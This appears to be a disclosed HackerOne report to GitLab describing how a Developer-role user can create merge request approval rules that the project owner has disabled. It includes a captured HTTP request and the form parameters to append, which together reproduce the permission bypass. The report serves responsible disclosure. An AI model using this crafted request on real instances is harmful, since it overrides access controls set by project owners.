Override approvers and approvals required per merge request despite no permissions
HackerOne report #544756 by ashish_r_padelkar
on 2019-04-21, assigned to estrike
:
Summary
Hello,
Owner/Maintainer of the project may prevent overriding of approvers and approvals required per merge request by having the below settings in project settings
However, Developer
users can still create new approval rules per merge request!
Steps to reproduce
- As a project owner , set a settings like below for merge request approval rule
-
As a
Developer
user in a project, go to any merge request and EDIT it. once it reloads, you see that you can not EDIT or Create new approval rules. -
Without doing anything else, just click on save and capture the below request
POST /PrivateGroupofGuest/project2/merge_requests/2 HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 542
Cache-Control: max-age=0
Origin: https://gitlab.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: https://gitlab.com/PrivateGroupofGuest/project2/merge_requests/2/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: _gitlab_session=1; event_filter=all; sidebar_collapsed=false
utf8=%E2%9C%93&_method=patch&authenticity_token=1&merge_request%5Btitle%5D=ExampleMergeRequest&merge_request%5Bdescription%5D=Closes+%233&merge_request%5Bassignee_id%5D=&merge_request%5Bmilestone_id%5D=847953&merge_request%5Blabel_ids%5D%5B%5D=&merge_request%5Blabel_ids%5D%5B%5D=10328587&merge_request%5Btarget_branch%5D=master&merge_request%5Bforce_remove_source_branch%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=
- Append below parameters in the above request
&merge_request[approval_rules_attributes][][name]=ThisIsCreatedDespiteSettingsByOnwer&merge_request[approval_rules_attributes][][user_ids][]=3148078&merge_request[approval_rules_attributes][][approvals_required]=1
Where as 3148078
is my user ID, you may try adding yours if mine doesnt work for you.
- So the final request would be like
POST /PrivateGroupofGuest/project2/merge_requests/2 HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 542
Cache-Control: max-age=0
Origin: https://gitlab.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: https://gitlab.com/PrivateGroupofGuest/project2/merge_requests/2/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: _gitlab_session=1; event_filter=all; sidebar_collapsed=false
utf8=%E2%9C%93&_method=patch&authenticity_token=1&merge_request%5Btitle%5D=WIP%3A+Resolve+%22yyyy%22&merge_request%5Bdescription%5D=Closes+%233&merge_request%5Bassignee_id%5D=&merge_request%5Bmilestone_id%5D=847953&merge_request%5Blabel_ids%5D%5B%5D=&merge_request%5Blabel_ids%5D%5B%5D=10328587&merge_request%5Btarget_branch%5D=master&merge_request%5Bforce_remove_source_branch%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=&merge_request[approval_rules_attributes][][name]=ThisIsCreatedDespiteSettingsByOnwer&merge_request[approval_rules_attributes][][user_ids][]=3148078&merge_request[approval_rules_attributes][][approvals_required]=1
-
Send this request. Once done, click on EDIT merge request again and scroll down to approval rules.
-
Now you should see the approval rule created despite it was not allowed by owners!
What is the current bug behavior?
Developer can override the merge request approval rules despite settings by owner!
What is the expected correct behavior?
Developer should not be allowed to create approval rule when owner isnt allowing to create
Output of checks
This bug happens on GitLab.com and probably on omnibus installations too!
Regards,
Ashish
Impact
Developers can override approval rule settings
Attachments
Warning: Attachments received through HackerOne, please exercise caution!